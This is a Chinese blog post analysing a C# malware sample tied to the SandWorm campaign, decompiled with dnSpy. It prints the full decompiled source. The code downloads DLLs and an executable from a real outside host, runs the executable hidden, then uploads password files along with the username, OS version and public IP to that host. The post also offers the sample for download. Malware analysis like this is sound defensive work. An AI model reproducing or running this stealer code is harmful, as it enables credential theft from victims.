Virus_C#_SampleAnalysis

最新推荐文章于 2021-10-30 20:48:54 发布
最新推荐文章于 2021-10-30 20:48:54 发布
阅读量398 收藏
点赞数
分类专栏: 工具学习 文章标签: C#-Virus
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ahoo110/article/details/77148404
版权

0x1 背景

这几天在做一些小结,除了二进制,也对其他的做点记录,本篇讲C#样本的简单分析.

前几天启明有篇文章讲到了SandWorm样本,漏洞部分也没分析,就跟着文章的描述简单的过了一遍,下载到文章中提到的Down样本.用PEId查壳是 Microsoft Visual C# / Basic .NET,快速的做了分析.

0x2 主角登场

本来该是样本的,但个人感觉dnSpy更牛逼闪闪,话不多说,上图:
dnSpy

注:项目右键:1可以Debug,2可以保存为本地项目(见附件)
ILSpy也可以吧,喜欢的还是他俩.

2.1样本分析

using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Net.Http;
using System.Threading.Tasks;

namespace DownloadAndExecute
{
    internal class Program
    {
        private static readonly HttpClient client = new HttpClient();

        private static bool success = false;

        private static int exitCode = 1;

        private static void Main(string[] args)
        {
            Program.DownloadFiles().Wait();
            if (Program.success)
            {
                using (Process process = Process.Start(new ProcessStartInfo
                {
                    FileName = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Vine.exe"),
                    WindowStyle = ProcessWindowStyle.Hidden,
                    WorkingDirectory = Path.GetDirectoryName(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Vine.exe")),
                    CreateNoWindow = true
                }))
                {
                    process.WaitForExit();
                    Program.exitCode = process.ExitCode;
                }
            }
            if (Program.exitCode == 0)
            {
                Program.UploadFiles().Wait();
            }
        }

        private static async Task UploadFiles()
        {
            try
            {
                int num;
                FileInfo[] array;
                int num2;
                if (num > 2)
                {
                    FileInfo[] files = new DirectoryInfo(Path.Combine(new string[]
                    {
                        Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)
                    })).GetFiles();
                    array = files;
                    num2 = 0;
                    goto IL_28A;
                }
                IL_70:
                FileInfo fileInfo;
                try
                {
                    string value = File.ReadAllText(fileInfo.FullName);
                    string value2 = await Program.GetExternalIPAddress();
                    FormUrlEncodedContent content = new FormUrlEncodedContent(new Dictionary<string, string>
                    {
                        {
                            "data",
                            "data"
                        },
                        {
                            "username",
                            Environment.UserName
                        },
                        {
                            "os_version",
                            Environment.OSVersion.VersionString
                        },
                        {
                            "file_path",
                            fileInfo.Name
                        },
                        {
                            "public_ip",
                            value2
                        },
                        {
                            "file_content",
                            value
                        }
                    });
                    if (await(await Program.client.PostAsync("http://www.ictcoe.org.et/plugins/system/legacy/core.php", content)).Content.ReadAsStringAsync() == fileInfo.Name)
                    {
                        fileInfo.Delete();
                    }
                    value = null;
                }
                catch (Exception)
                {
                }
                IL_275:
                fileInfo = null;
                num2++;
                IL_28A:
                if (num2 >= array.Length)
                {
                    array = null;
                }
                else
                {
                    fileInfo = array[num2];
                    if (fileInfo.Name.StartsWith("pass"))
                    {
                        goto IL_70;
                    }
                    goto IL_275;
                }
            }
            catch (Exception)
            {
            }
        }

        private static async Task<string> GetExternalIPAddress()
        {
            string result;
            try
            {
                result = (await(await Program.client.GetAsync("http://checkip.dyndns.org")).Content.ReadAsStringAsync()).Split(new char[]
                {
                    ':'
                })[1].Substring(1).Split(new char[]
                {
                    '<'
                })[0];
            }
            catch (Exception)
            {
                result = "";
            }
            return result;
        }

        private static async Task DownloadFiles()
        {
            try
            {
                string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Newtonsoft.Json.dll");
                FileInfo fileInfo = new FileInfo(text);
                if (!fileInfo.Exists)
                {
                    byte[] buffer = await(await Program.client.GetAsync("http://www.ictcoe.org.et/plugins/system/legacy/Newtonsoft.Json.dll")).Content.ReadAsByteArrayAsync();
                    BinaryWriter expr_144 = new BinaryWriter(new FileStream(text, FileMode.Create));
                    expr_144.Write(buffer);
                    expr_144.Close();
                }
                fileInfo = new FileInfo(text);
                Console.WriteLine("Newton soft json dll length is: " + fileInfo.Length);
                string text2 = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "System.Data.SQLite.DLL");
                FileInfo fileInfo2 = new FileInfo(text2);
                if (!fileInfo2.Exists)
                {
                    byte[] var_7_27E = await(await Program.client.GetAsync("http://www.ictcoe.org.et/plugins/system/legacy/System.Data.SQLite.DLL")).Content.ReadAsByteArrayAsync();
                    BinaryWriter expr_291 = new BinaryWriter(new FileStream(text2, FileMode.Create));
                    expr_291.Write(var_7_27E);
                    expr_291.Close();
                }
                fileInfo2 = new FileInfo(text2);
                Console.WriteLine("Sqlite dll length is: " + fileInfo2.Length);
                string text3 = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Vine.exe");
                FileInfo fileInfo3 = new FileInfo(text3);
                if (!fileInfo3.Exists)
                {
                    byte[] var_8_3CB = await(await Program.client.GetAsync("http://www.ictcoe.org.et/plugins/system/legacy/Vine.exe")).Content.ReadAsByteArrayAsync();
                    BinaryWriter expr_3DE = new BinaryWriter(new FileStream(text3, FileMode.Create));
                    expr_3DE.Write(var_8_3CB);
                    expr_3DE.Close();
                }
                fileInfo3 = new FileInfo(text3);
                Console.WriteLine("Vine exe length is: " + fileInfo3.Length);
                Program.success = true;
                text = null;
                text2 = null;
                text3 = null;
            }
            catch (Exception)
            {
            }
        }
    }
}

0x3 Sample

Sample-请确认样本只用于测试才下载,其他的我可不负-密码国际惯例

0x4 参考文章

“沙虫”二代来袭,office全线沦陷!

ahoo110
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
AnalysisService C#示例程序
01-04
C#编写的MS AnalysisService2000示例程序,展示数据仓库和数据挖掘的连接方法。应用了ADOMD.NET控件。
C# Programming: From Problem Analysis to Program Design
07-24
C# Programming: From Problem Analysis to Program Design 1184 pages Publisher: Cengage Learning; 4 edition (April 30, 2013) Language: English ISBN-10: 1285096266 ISBN-13: 978-1285096261 Only Doyle's C# PROGRAMMING: FROM PROBLEM ANALYSIS TO PROGRAM DESIGN, 4E brilliantly balances today's most important programming principles and concepts with the latest insights into C#. This perfect introductory book highlights the latest Visual Studio 2012 and C# 4.0 with a unique, principles-based approach to give readers a deep understanding of programming. You'll find just the right amount of detail to create an important foundation in programming. This edition's straightforward approach and understandable vocabulary make it easier for readers to grasp new programming concepts without distraction. The book introduces a variety of fundamental programming concepts, from data types and expressions to arrays and collections, all using the popular C# language. New programming exercises and new numbered examples throughout this edition reflect the latest updates in Visual Studio 2012, while learning objectives, case studies and Coding Standards summaries in each chapter ensure mastery. While the book assumes no prior programming knowledge, coverage extends beyond traditional books to cover new advanced topics, such as portable class libraries used to create applications for Windows Phone and other platforms.
分析样本获取
weixin_30682127的博客
04-12 315
场景 需要样本文件来进行分析实践访问以下网站获取: 1、http://malshare.com/ 2、http://www.malware-traffic-analysis.net/ 3、https://virusshare.com/ 4、http://virusign.com/ 5、https://github.com/ytisf/theZoo(可帮助组织搜索和分析特定的恶意软...
DataAnalysis
02-08
利用C#实现简单调用Excel中数据,主要是打开指定excel(bin文件夹下),读取数据,关闭excel基本功能
部分与脱
megaparsec
10-30 3283
与脱 对网上部分与脱的摘录与总结,仅供参考
Virus_Html_SampleAnalysis
ahoo110的博客
08-13 3216
本篇讲Html的挂马的常见手法.
clean-exe-file-virus-by-Java.rar_java virus_virus_杀毒软件
09-22
标题中的"clean-exe-file-virus-by-Java.rar"表明这是一个使用Java编程语言开发的项目,目的是清除EXE可执行文件中的病毒。描述中提到,这个项目简单地实现了杀毒软件的基本功能,这意味着它可能包括了扫描、检测和...
vb.rar_project ansav vbp_virus_杀毒
09-22
【标题】"vb.rar_project ansav vbp_virus_杀毒" 涉及到的知识点主要集中在VB(Visual Basic)编程语言上,用于开发一个杀毒软件项目。VB是微软公司推出的一种基于事件驱动的编程环境,尤其适合于创建Windows应用...
virus_endophyte_interactions
03-18
"Virus_endophyte_interactions"这个项目显然关注的是病毒与内生菌(endophytes)之间的交互关系,这是一种生物学现象,其中病毒和内生菌在植物体内共存,并可能相互影响。这种互动可能会对植物健康、病害抵抗力以及...
Virus专杀工具 Virus.Win32.TuTu(Sality) 专杀
05-22
Virus.Win32.TuTu(Sality) 专杀
Analysis Services 数据挖掘
10-10
c#数据挖掘的示例,描叙了如何创建一个数据挖掘的工程.
Web应用测试工具Pioneer.js.zip
07-17
Pioneer 是一个易于理解的 JavaScript 领域专用语言,通过真实的浏览器与你的应用进行交互并测试其运行状态。 标签:Pioneer
Virus.Win32.Ramnit.X专杀工具
07-09
Virus.Win32.Ramnit.X,Virus.Win32.Ramnit.a,Virus.Win32.Ramnit.b病毒专杀工具。
ISI_isi_virus_zip_
10-02
【标题】"ISI_isi_virus_zip_" 暗示了我们正在处理与信息安全(ISI)相关的主题,特别是涉及到一种病毒,该病毒可能存在于一个ZIP压缩文件中。ZIP文件是一种常见的文件压缩格式,它允许用户将多个文件打包成一个单一...
virus_spread_client
06-07
总之,尽管"virus_spread_client"项目已经不再活跃,但它仍能让我们深入理解JavaScript编程、模拟算法以及如何构建互动式的网络应用。对于想要学习这些技能的人来说,这是一个有价值的案例研究资源。
电脑中了virus.win32.sality.i和virus.win32.pioneer.c病毒,导致所以的EXE文件打不开(打开浏览器会提示:xc0000005异常)
热门推荐
pulin19940303的博客
09-18 1万+
本人的电脑最近在打开可执行文件(EXE)时,会出现打开以后没反应的情况,导致很多软件都用不了,上网查询了一下EXE文件启动不了的问题以后,我这边打算安装360软件修复一下,在首次安装了360以后,发现360只显示一个图标,点了图标以后电脑没有任何反应,这个时候我的心顿时凉了一截。跑去看了网上电脑中毒(virus.win32.sality.i和virus.win32.pioneer.c)以后,网友们...
在r中读取一个csv,根据virus_name_N和virus_name_X两列,提取任一首字段是Viruses的行
最新发布
06-03
2. 根据virus_name_N和virus_name_X两列,提取任一首字段是Viruses的行 ```R df (df, virus_name_N == "Viruses" | virus_name_X == "Viruses") ``` 3. 将空缺值用NA代替 ```R df[is.na(df)] ``` 这样,你就...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值